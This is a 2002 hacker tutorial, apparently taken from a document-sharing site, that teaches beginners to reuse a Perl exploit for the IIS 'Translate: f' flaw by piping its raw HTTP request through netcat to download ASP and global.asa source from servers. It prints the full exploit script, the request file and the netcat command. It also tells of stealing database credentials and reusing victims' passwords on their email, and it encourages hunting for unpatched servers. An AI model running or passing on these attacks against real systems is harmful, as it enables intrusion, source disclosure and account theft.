*************************************************************************************************************** Cribbing Perl code to recover exploits for use in netcat_nt ------------------------------------------------------------------------- by MooMF 09/2002 *************************************************************************************************************** You'll need: netcat (for NT/2000) ; Perl exploit for "Translate: f malformed GET request", (currently @

helmetpastoralΛογισμικό & κατασκευή λογ/κού

13 Δεκ 2013 (πριν από 3 χρόνια και 8 μήνες)

87 εμφανίσεις

***************************************************************************************************************


Cribbing Perl code to recover exploits for use in netcat_nt


-------------------------------------------------------------------------


by MooM
F 09/2002

***************************************************************************************************************

You'll need:


netcat (for NT/2000)

;

Perl exploit for "Translate: f malformed GET request", (currently @
http://www.securiteam.com/win
dowsntfocus/Translate_f_vulnerability_exposes_IIS_files_source.
html)

;


an Internet connection (duh!)

;


your mind, (a bit).

***************************************************************************************************************

Skill level:


New
bie

Teaches:


A little http, a pinch of netcat, and a quick touch on what Perl is.

You should already know:


Using a dos command window,


Copying stuff and shit.

*********************************************************************************************
******************

Synopsis:

This tute looks into practical ways to examine the wealth of exploit code freely available on the
net, using the “translate: f” exploit as an example. Specifically, we’ll look into piping cribbed
http requests, taken from Pe
rl script, through netcat, at a target.

The translate: f exploit allows ASP code to be viewed directly, instead of allowing it to correctly
output the html
-
rendered result, on IIS 5 servers in certain configurations. It does this by
requesting the file i
n a manner the webserver does not expect.

***************************************************************************************************************

Concentrate, here comes the science bit:

Down to business. First thing to do is examine the script, a
nd find out what’s going on. We’ll
concentrate on the parts of the script that directly relate to how the exploit works, and disregard
the actual mechanisms of the Perl code.

Before we look at the exploit proper, I should explain that it is an http
-
base
d exploit, in that it
uses http to communicate with the target server. Http is the underlying language of the web;
when you visit a site using a web browser, http requests are being relayed unnoticed to and from
your machine to allow the transfer of data
to take place. Primarily, the http GET request is being
used to ask the webserver to send us a given object that forms part of the website we’re visiting,
(usually a html webpage, but could be a gif, an ASP page, a database, etc). Other commands
exist,
(a PUT for example), but we’re interested only in GET at this point. Several webserver
based exploits involve either a GET or a PUT, and so allow (reasonably) easy identification of these
http parts within the Perl code. With this in mind, centre your ga
ze on the section labelled
below.


The exploit, (coded by Roelof Temmingh at Sensepost.com):

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#!/usr/bin/perl

use Socket;

####test arguments

if ($#ARGV != 2) {die "usage: DNS_nam
e/IP file_to_get port
\
n";}

#####load values

$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];

#####build request

$xtosend=<<EOT

GET /$toget
\
\

HTTP/1.0




<<
---------------

Here

Host: $host

User
-
Agent: SensePostData

Content
-
Type
: application/x
-
www
-
form
-
urlencoded

Translate: f







<<
---------------

to here

EOT

;

$xtosend=~s/
\
n/
\
r
\
n/g;

####send request

#print $xtosend;

my @results=sendraw($xtosend);

print @results;

#### Sendraw
-

thanx RFP rfp@wiretrip.net

sub sendraw { # this sa
ves the whole transaction anyway


my ($pstr)=@_;


socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||


die("Socket problems
\
n");


if(connect(S,pack "SnA4x8",2,$port,$target)){


my @in;



select(S); $|=1; print $pstr;


while(<S>){ push @in, $_;


print STDOUT "." if(defined $args{X});}


select(STDOUT); close(S); return @in;


} else { die("Can't connect...
\
n"); }

}

++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This Perl script is basically creating a connection from you, to the target, based on

parameters passed to the Perl interpreter, (the bit that runs the script).

An example of the command syn
tax, as shown on the webpage, is:

trans.pl www.example.com login.asp 80

Where trans.pl is the name of the script above, www.example.com is the target, login.asp is the
code we want to download, and 80 is the webserver port on www.example.com. We can see
the
login.asp parameter is stored in variable
$toget, and the target, (www.example.com), is stored in
variable $host. Don’t worry if you don’t know what a variable is, just look at the labelled section
again, and you’ll see it says |GET /$toget
\
\

HTTP/1.0
| on the first line, and |Host: $host| on the
second line. In essence, the bits that say $toget and $host will be replaced by login.asp and
www.example.com respectively, when the request is sent to the target. In addition, Perl requires
that two back sla
shes be placed in script, when one is required at output. So, in reality, this
section of the Perl script really means:



GET /login.asp
\

HTTP/1.0



<<
--------------

Note, only one ‘
\


Host: www.example.com


With these caveats noted, we can now create a n
ew text file with just the http requests in.
Navigate to netcat’s folder, and add to it a new text file called trans.txt. Type the following into
this new file:

GET /global.asa
\

HTTP/1.0





Host: : www.example.com

User
-
Agent: SensePostData

Content
-
Type:

application/x
-
www
-
form
-
urlencoded

Translate: f

<CR>

<CR>

Change www.example.com to the server you’re looking to investigate, (IP or name is fine), but for
now, leave the file as global.asa.


Short interlude regarding global.asa

“The Global.asa file typi
cally contains scripts to initialise application or session variables,
connect to databases, send cookies, and perform other operations that pertain to the
application as a whole.”


Microsoft.

From this description, it’s easy to see why the global.asa fil
e is a useful target to
download. Some sites quite literally put the whole enchilada into this sucka; I fondly
remember one site that had the user/pass combinations for an access database in its
global.asa, along with the location of the database, (which
was in a read
-
access area of
the site).

e.g.


Application("scbjobs_ConnectionString") = "DRIVER={Microsoft Access _

Driver (*.mdb)};DBQ=
URL=jobs.mdb
"

Application("scbjobs_
RuntimeUserName") = "scbjobs"

Application("scbjobs_
RuntimePassword") = "sbojbcs"


I
n the database were the user/pass combinations for users to access site, (which was
pretty dull), along with newsletter email addresses. Now, I kinda got lucky quite a few
times here, as often, the users were using the same password to access this piece
-
o
f
-
piss
site as they were for their email accounts. Bingo!! No real hacking required.


Also note the requirement for two carriage returns at the end of the file. Just replace the <CR>
symbols with a press of the enter key each. Save it. Our input file
is now ready, and we can move
on to look at netcat.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Netcat:

For those who haven’t come across netcat before, I’ll include here a v.short description of what it
is, what it does,

and what it’s for. Whilst I won’t examine the syntax too deeply, as several well
-
written documents already exist that exhaustively explore this topic, (plus source code is
available), I will note how we can use it as a carrier for our newly cribbed explo
its.

Netcat is essentially a user interface into the network sockets on the PC. By allowing a fairly low
-
level access to the underlying network interface, netcat is able to perform some quite remarkable
feats that help us in both enumerating and attacking

targets. Primarily for us, it can be used in a
similar role to telnet, in that it offers a console
-
based interface to open sockets on remote
machines. In addition however, it offers a degree of port probing/banner grabbing capability, and
can also be us
ed as a port listener/redirector, a powerful capability that allows it to wait for
incoming connections on an already compromised target, so it can be used to ‘bounce’
connections across to another target, (thus improving your anonymity, amongst other thin
gs).
Read up on netcat to find out more about these functions.

We’ll be using the basic syntax for netcat, so we can create a connection to our target, and run
our exploit, (trans.txt). We could boot up netcat and type our exploit in manually, but instea
d,
we’ll pipe our exploit through netcat using good old dos pipes.

Crank up a command window. Navigate to the folder we created earlier, and type in this
command:

type trans.txt | nc

vv [target] 80

I’ll deal with the netcat stuff first, on the right of

the command:

nc

vv [target] 80

Here were connecting to the target @ port 80, (the usual webserver port). The

vv part of the
command signifies the options we require, (in this case very verbose output). The [target] part
should be replaced with the sam
e thing you put into trans.txt on the Host: line.

The left
-
hand part of the command is just a dos command. ‘Type’ basically returns the contents of
a file to the STDOUT stream of the console, (usually the screen/your monitor). Just enter ‘type
trans.txt’
on it’s own to see what it does.

Now, the line in the middle is called a pipe, and it’s function is to take the output of the type
program, and dump it as input into netcat, (in essence the STDOUT is redirected to point at
netcat, not your screen. Now t
he text is ‘typed’ into netcat’s interface as though we were doing
it manually). The pipe key is shift + ‘
\
’ on UK keyboards.

Now before we hit enter I should warn you that this exploit is now a little old, and has had an
official patch issued from MS. S
o, don’t go expecting it to work on every target. In fact, don’t be
surprised if it doesn’t work on many servers at all. This is the nature of network security. Indeed,
this is a good time to remind everyone that, (fanfare please), Enumeration is the ke
y aspect of
hacking, even if it just means you don’t spend days trying to exploit a server that is immune to
your attacks, (technically known as pissin’ in the wind).

So, chances are, when you hit enter, all you’ll get back is a crappy looking text dump of

the
received html, (a 404


object not found), correctly delivered from a patched server. However,
occasionally, (and I live for these moments), you’ll find a sucker who just can’t be arsed to keep
up with all the latest patches from MS, (who can blame h
im!), and who is at your mercy. These
responses will be 200
-

Ok, and effectively they are the contents of the global.asa file on the
server, as coded by the developer. Take a moment and enjoy.

Every now and then, you’ll get a 403
-
Access denied back, and
this may indicate the server is
vulnerable, just not in that folder. Change the target file, (GET line in trans.txt) to another part
of the site to see if any luck can be found there, (eg change /global.asa
\

to
/myworldtakeoverplan/login.asp
\
).

That’s abo
ut it…. It’s a fairly basic example, I know, but serves well to demonstrate the general
idea behind this learning exercise. Please use this tute as an excuse to further look into the
wealth of knowledge basically lying around on the web as Perl exploits,

and learn. And remember,
in the land of the blind, the one
-
eyed man is king, (this could be you!).


***************************************************************************************************************

Please note usual caveats apply on this te
xt, in terms of my lack of responsibility should you use
this stuff and get caught by the NSA, who think you’re a terrorist and start bombing your country
and stuff. I just don’t want to hear it. Also, my respects go out to all at AV, (esp. Andy, who
pro
ofed this), and those whose work I’ve included here.

***************************************************************************************************************

Peace,

MooMF.